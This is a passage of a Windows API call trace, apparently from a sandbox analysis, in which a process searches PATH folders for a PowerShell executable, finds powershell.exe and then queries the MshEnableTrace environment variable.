	[0409.847] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.847] SetErrorMode (uMode=0x1) returned 0x1
	[0409.848] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.848] SetErrorMode (uMode=0x1) returned 0x1
	[0409.848] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.848] SetErrorMode (uMode=0x1) returned 0x1
	[0409.848] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.848] SetErrorMode (uMode=0x1) returned 0x1
	[0409.848] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.849] SetErrorMode (uMode=0x1) returned 0x1
	[0409.849] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.849] SetErrorMode (uMode=0x1) returned 0x1
	[0409.849] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.849] SetErrorMode (uMode=0x1) returned 0x1
	[0409.849] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.849] SetErrorMode (uMode=0x1) returned 0x1
	[0409.849] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.850] SetErrorMode (uMode=0x1) returned 0x1
	[0409.850] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.850] SetErrorMode (uMode=0x1) returned 0x1
	[0409.850] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.850] SetErrorMode (uMode=0x1) returned 0x1
	[0409.850] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.851] SetErrorMode (uMode=0x1) returned 0x1
	[0409.851] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.851] SetErrorMode (uMode=0x1) returned 0x1
	[0409.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.851] SetErrorMode (uMode=0x1) returned 0x1
	[0409.851] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.851] SetErrorMode (uMode=0x1) returned 0x1
	[0409.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.852] SetErrorMode (uMode=0x1) returned 0x1
	[0409.852] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.852] SetErrorMode (uMode=0x1) returned 0x1
	[0409.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.852] SetErrorMode (uMode=0x1) returned 0x1
	[0409.852] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.853] SetErrorMode (uMode=0x1) returned 0x1
	[0409.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.853] SetErrorMode (uMode=0x1) returned 0x1
	[0409.853] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.853] SetErrorMode (uMode=0x1) returned 0x1
	[0409.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.853] SetErrorMode (uMode=0x1) returned 0x1
	[0409.854] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.854] SetErrorMode (uMode=0x1) returned 0x1
	[0409.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.854] SetErrorMode (uMode=0x1) returned 0x1
	[0409.854] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.854] SetErrorMode (uMode=0x1) returned 0x1
	[0409.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.855] SetErrorMode (uMode=0x1) returned 0x1
	[0409.855] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.855] SetErrorMode (uMode=0x1) returned 0x1
	[0409.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.855] SetErrorMode (uMode=0x1) returned 0x1
	[0409.855] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.855] SetErrorMode (uMode=0x1) returned 0x1
	[0409.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.856] SetErrorMode (uMode=0x1) returned 0x1
	[0409.856] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.856] SetErrorMode (uMode=0x1) returned 0x1
	[0409.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.856] SetErrorMode (uMode=0x1) returned 0x1
	[0409.856] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.857] SetErrorMode (uMode=0x1) returned 0x1
	[0409.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.857] SetErrorMode (uMode=0x1) returned 0x1
	[0409.857] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.857] SetErrorMode (uMode=0x1) returned 0x1
	[0409.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.858] SetErrorMode (uMode=0x1) returned 0x1
	[0409.858] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.858] SetErrorMode (uMode=0x1) returned 0x1
	[0409.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.858] SetErrorMode (uMode=0x1) returned 0x1
	[0409.858] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.859] SetErrorMode (uMode=0x1) returned 0x1
	[0409.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.859] SetErrorMode (uMode=0x1) returned 0x1
	[0409.859] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.859] SetErrorMode (uMode=0x1) returned 0x1
	[0409.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0409.859] SetErrorMode (uMode=0x1) returned 0x1
	[0409.859] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.860] SetErrorMode (uMode=0x1) returned 0x1
	[0409.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0409.860] SetErrorMode (uMode=0x1) returned 0x1
	[0409.860] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.860] SetErrorMode (uMode=0x1) returned 0x1
	[0409.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0409.860] SetErrorMode (uMode=0x1) returned 0x1
	[0409.860] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.861] SetErrorMode (uMode=0x1) returned 0x1
	[0409.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0409.861] SetErrorMode (uMode=0x1) returned 0x1
	[0409.861] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.861] SetErrorMode (uMode=0x1) returned 0x1
	[0409.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0409.861] SetErrorMode (uMode=0x1) returned 0x1
	[0409.861] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.862] SetErrorMode (uMode=0x1) returned 0x1
	[0409.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0409.862] SetErrorMode (uMode=0x1) returned 0x1
	[0409.862] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x365da0
	[0409.863] FindNextFileW (in: hFindFile=0x365da0, lpFindFileData=0x1c76dff0 | out: lpFindFileData=0x1c76dff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0409.864] FindClose (in: hFindFile=0x365da0 | out: hFindFile=0x365da0) returned 1
	[0409.864] SetErrorMode (uMode=0x1) returned 0x1
	[0409.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c76e100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0409.864] SetErrorMode (uMode=0x1) returned 0x1
	[0409.864] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c76e310 | out: lpFileInformation=0x1c76e310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0409.865] SetErrorMode (uMode=0x1) returned 0x1
	[0409.865] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0409.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.866] CoTaskMemFree (pv=0x34e8b0) 
	[0409.867] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0409.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.867] CoTaskMemFree (pv=0x34e8b0) 
	[0409.869] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0409.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0409.869] CoTaskMemFree (pv=0x34e8b0) 
	[0409.877] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0409.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
